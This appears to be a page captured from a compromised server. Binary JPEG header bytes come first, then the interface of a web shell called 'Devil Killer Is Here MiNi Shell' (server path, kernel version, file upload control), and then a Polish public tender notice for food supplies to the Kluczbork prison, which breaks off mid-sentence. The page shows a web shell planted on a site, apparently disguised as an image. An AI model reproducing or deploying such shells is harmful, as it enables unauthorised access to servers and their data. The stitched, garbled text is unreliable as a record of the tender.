JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251027/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251027/0049863201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne dostawy artykułów spoż.- produkty przemiału ziarna, przetworzone owoce i warzywa, cukier, woda, przyprawy </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Karny w Kluczborku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000321000</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Katowicka, 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kluczbork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_kluczbork@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne dostawy artykułów spoż.- produkty przemiału ziarna, przetworzone owoce i warzywa, cukier, woda, przyprawy </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-79054042-d9ca-4550-800f-26867a4fcc9d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00498632</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00123463/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.6 Sukcesywne dostawy art. spożywczych- produkty przemiału ziarna, przetworzone owoce i warzywa, cukier, woda, przyprawy Do Zakładu Karnego w Kluczborku oraz Oddziału Zewnętrznego w Sierakowie Śląskim</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-79054042-d9ca-4550-800f-26867a4fcc9d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu:<br/>- platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl, w zakresie dotyczącym składania ofert oraz oświadczenia składanego na podstawie art. 125 ustawy Prawo zamówień publicznych;<br/>- w pozostałym zakresie dotyczącym niniejszego postępowania komunikacja Zamawiającego z Wykonawcami odbywa się za pośrednictwem środków komunikacji elektronicznej w postaci poczty elektronicznej e-mail: zk_kluczbork@sw.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Centrum pomocy platformy e-Zamówienia pod adresem https://ezamowienia.gov.pl/pl/komponent-edukacyjny/.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Dyrektor Zakładu Karnego w Kluczborku, ul. Katowicka 4, 46-200 Kluczbork;<br/>	Kontakt z administratorem bezpieczeństwa informacji w Zakładzie Karnym w Kuczborku: e-mail: zk_kluczbork@sw.gov.pl lub pisemnie na adres siedziby administratora danych osobowych;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu wypełnienia obowiązku prawnego ciążącego na administratorze, związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t. j Dz. U. z 2019 r. poz. 2019 ze zm.), dalej „ustawa Pzp”; <br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; a po tym czasie przez okres wymagany przepisami szczególnymi prawa, w szczególności ze względu na cele archiwalne- zgodnie z JRWA: dokumentacja zamówień publicznych posiada kategorię archiwalną B5 (okres przechowywania 5 lat) natomiast umowa zawartą w wyniku postępowania w trybie zamówień publicznych posiada kategorię archiwalną B10 (okres przechowywania 10 lat)<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>	przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Panu danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Dkw.2232.18.2025.EK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">10</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZEŚĆ NR 1 – PRODUKTY PRZEMIAŁU ZIARNA - dostawa do ZK w Kluczborku:<br/> 1.	Kasza jęczmienna w opak. do 25 kg - dostawy 1 raz na 2 tygodnie w ilości ok. 115 kg, kg	3 000;<br/>2.	Kasza manna w opak. do 25 kg -dostawy 1 raz na 2 tygodnie w ilości ok. 19 kg,	kg	500;<br/>3.	Mąka pszenna w opak. do 25 kg - dostawy 1 raz na 2 tygodnie w ilości ok. 46 kg	,kg	1 200;<br/>4.	Mąka ziemniaczana w opak. do 25 kg - dostawy 1 raz na 2 tygodnie w ilości ok. 2 kg,	kg	50;<br/>5.	Ryż w opak. do 25 kg -dostawy 1 raz na 2 tygodnie w ilości ok. 162 kg,	kg	4 200;<br/>6.	Makaron różne formy w opak. do 50 kg - dostawy 1 raz na 2 tygodnie w ilości ok. 192 kg,	kg	5 000; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15610000-7 - Produkty przemiału ziarna</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZEŚĆ NR 2 – PRZETWORZONE OWOCE I WARZYWA - dostawa do ZK w Kluczborku:<br/>1.	Groch połówki łuskany w opak. do 50 kg - dostawy 1 raz na 2 tygodnie w ilości ok. 29 kg,	kg	750;<br/>2.	Fasola średnia w opak. do 50 kg - dostawy 1 raz na 2 tygodnie w ilości ok. 96 kg,	kg	2 500;<br/>3.	Kostka sojowa w opak. do 50 kg - dostawy 1 raz na 2 tygodnie w ilości ok. 23 kg,	kg	600;<br/>4.	Kotlety sojowe - kotlet a&#39;la schabowy o gramaturze min.30 g/szt.<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 5 kg,	kg	140;<br/>5.	Pasztet sojowy Alupak 110 g – 130 g<br/>dostawy 1 raz na 2 tygodnie w ilości ok. 12 kg,	kg	300;<br/>6.	Dżem niskosłodzony w wiaderkach do 10 kg – dostawy 1 raz na 2 tygodnie w ilości ok. 54 kg,	kg	1 400;<br/>7.	Marmolada w opak. do 15 kg - dostawy 1 raz na 2 tygodnie w ilości ok. 88 kg	,kg	2 300;<br/>8.	Powidła śliwkowe do 15 kg - dostawy 1 raz na 2 tygodnie w ilości ok. 65 kg,	kg	1 700; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15330000-0 - Przetworzone owoce i warzywa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZEŚĆ NR 3 – CUKIER -dostawa do ZK w Kluczborku:<br/>1.	Cukier biały w opak. do 25 kg - dostawy 1 raz w miesiącu w ilości ok. 206 kg,	kg	2 500. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15831200-4 - Cukier biały</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZEŚĆ NR 4 – WODA MINERALNA - dostawa do ZK w Kluczborku:<br/>Woda mineralna niegazowana w butelkach 1,5 l – dostawy 1 raz w miesiącu w ilości ok. 247 l,	l	3 000. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15981000-8 - Wody mineralne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZEŚĆ NR 5 – PRZYPRAWY, ZUPY I SOSY - dostawa do ZK w Kluczborku:<br/>1	Czosnek mielony w opak. do 1 kg - CPV 15872100-2<br/>dostawy 1 raz w miesiącu w ilości ok. 13 kg	kg	155<br/>2	Papryka ostra mielona w opak. od 1 do 5 kg - CPV 15870000-7<br/>dostawy 1 raz w miesiącu w ilości ok. 8 kg	kg	100<br/>3	Pieprz czarny mielony w opak. od 1 do 5 kg - CPV 15872100-2<br/>dostawy 1 raz w miesiącu w ilości ok. 18 kg	kg	220<br/>4	Sól spożywcza w opak. do 50 kg - CPV 15872400-5 <br/>dostawy 1 raz w miesiącu w ilości ok. 105 kg	kg	1 270<br/>5	Liść laurowy w opak. od 1 do 3 kg - CPV 15872000-1<br/>dostawy 1 raz w miesiącu w ilości ok. 1,3 kg	kg	16<br/>6	Ziele angielskie w opak. od 1 do 5 kg - CPV 15872000-1<br/>dostawy 1 raz w miesiącu w ilości ok. 1,2 kg	kg	15<br/>7	Majeranek suszony w opak. od 1 do 3 kg - CPV 15872000-1<br/>dostawy 1 raz w miesiącu w ilości ok. 5 kg	kg	60<br/>8	Koper suszony w opak. od 1 do 3 kg - CPV 15872000-1<br/>dostawy 1 raz w miesiącu w ilości ok. 0,8 kg	kg	10<br/>9	Musztarda w opak. Do 5 kg – CPV 15871250-1<br/>dostawy 1 raz w miesiącu w ilości ok. 17 kg	kg	210<br/>10	Majonez w opak. Do 5 kg – CPV 15871273-8<br/>dostawy 1 raz w miesiącu w ilości ok. 2 kg	kg	30<br/>11	Ocet w opak. od 0,5 do 1 l - CPV 15871110-8 <br/>dostawy 1 raz w miesiącu w ilości ok. 8 l	l	100<br/>12	Kwasek cytrynowy w opak. do 5 kg - CPV 15870000-7<br/>dostawy 1 raz w miesiącu w ilości ok. 1 kg	kg	14<br/>13	Przyprawa do zup w płynie w opak. Do 1 l - CPV 15870000-7<br/>dostawy 1 raz w miesiącu w ilości ok. 148 l	l	1 800<br/>14	Koncentrat pomidorowy 30% w opak. od 0,9 do 5 kg - CPV 15331427-6<br/>dostawy 1 raz w miesiącu w ilości ok. 132 kg	kg	1 600<br/>15	Leczo pieczarkowe w opak. od 5 do 10 kg - CPV 15331000-7<br/>dostawy 1 raz w miesiącu w ilości ok. 91 kg	kg	1 100<br/>16	Herbata w opak. do 1 kg - CPV15863000-5<br/>dostawy 1 raz w miesiącu w ilości ok. 33 kg	kg	400<br/>17	Kawa zbożowa w opak. do 50 kg - CPV 15860000-4<br/>dostawy 1 raz w miesiącu w ilości ok. 33 kg	kg	400<br/>18	Bulion warzywny w opak. do 5 kg – CPV 15891500-5<br/>dostawy 1 raz w miesiącu w ilości ok. 69 kg	kg	840<br/>19	Zupa barszcz czerwony w opak. od 1 do 5 kg - CPV 15891400-4<br/>dostawy 1 raz w miesiącu w ilości ok. 8 kg	kg	100<br/>20	Zupa kalafiorowa w opak. od 1 do 5 kg - CPV 15891400-4<br/>dostawy 1 raz w miesiącu w ilości ok. 11 kg	kg	130<br/>21	Zupa brokułowa w opak. od 1 do 5 kg - CPV 15891400-5<br/>dostawy 1 raz w miesiącu w ilości ok. 10 kg	kg	120<br/>22	Zupa żurek w opak. od 1 do 5 kg - CPV 15891400-4<br/>dostawy 1 raz w miesiącu w ilości ok. 8 kg	kg	100<br/>23	Zupa szparagowa w opak. od 1 do 5 kg - CPV 15891400-5<br/>dostawy 1 raz w miesiącu w ilości ok. 9 kg	kg	110<br/>24	Zupa grzybowa w opak. od 1 do 5 kg - CPV 15891400-4<br/>dostawy 1 raz w miesiącu w ilości ok. 10 kg	kg	120<br/>25	Sos myśliwski w opak. od 1 do 5 kg - CPV 15871200-6<br/>dostawy 1 raz w miesiącu w ilości ok. 2 kg	kg	20<br/>26	Nać pietruszki suszona w opak. od 1 do 5 kg - CPV 15871200-6<br/>dostawy 1 raz w miesiącu w ilości ok. 1 kg	kg	9 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15891000-0 - Zupy i buliony</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu 